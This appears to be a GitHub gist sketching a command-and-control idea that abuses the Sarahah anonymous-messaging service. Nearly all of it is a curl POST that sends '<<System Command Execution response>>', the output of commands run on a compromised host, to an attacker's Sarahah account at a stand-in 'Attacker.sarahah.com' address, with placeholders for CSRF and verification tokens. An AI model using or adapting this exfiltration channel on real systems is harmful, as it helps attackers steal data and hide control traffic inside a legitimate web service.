n0obs73r
/ sarahah c2
Created
January 22, 2019 12:46
— forked from ChaitanyaHaritash/sarahah c2
sarahah c2 (small implementation for Idea i had in my mind)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Its a curl implimentation of idea i had in my mind :) i was making a python script for better demo but due to lack of time, i was | |
| able to make only curl payload, i hope it'll give some understanding of what i was thinking lol | |
| curl -i -s -k -X 'POST' \ | |
| -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0' -H 'Referer: https://Attacker.sarahah.com/' -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H 'X-Requested-With: XMLHttpRequest' \ | |
| -b '.AspNetCore.Antiforgery.w5W7x28NAIs=<<<CSRF Token(I guess, im not good in webapps)>>>' \ | |
| --data-binary $'__RequestVerificationToken=<<Request Verification Token>>&userId=<<User ID of Attacker>>&text=<<System Command Execution response>>&captchaResponse=' \ | |
| 'https://Attacker.sarahah.com/Messages/SendMessage' |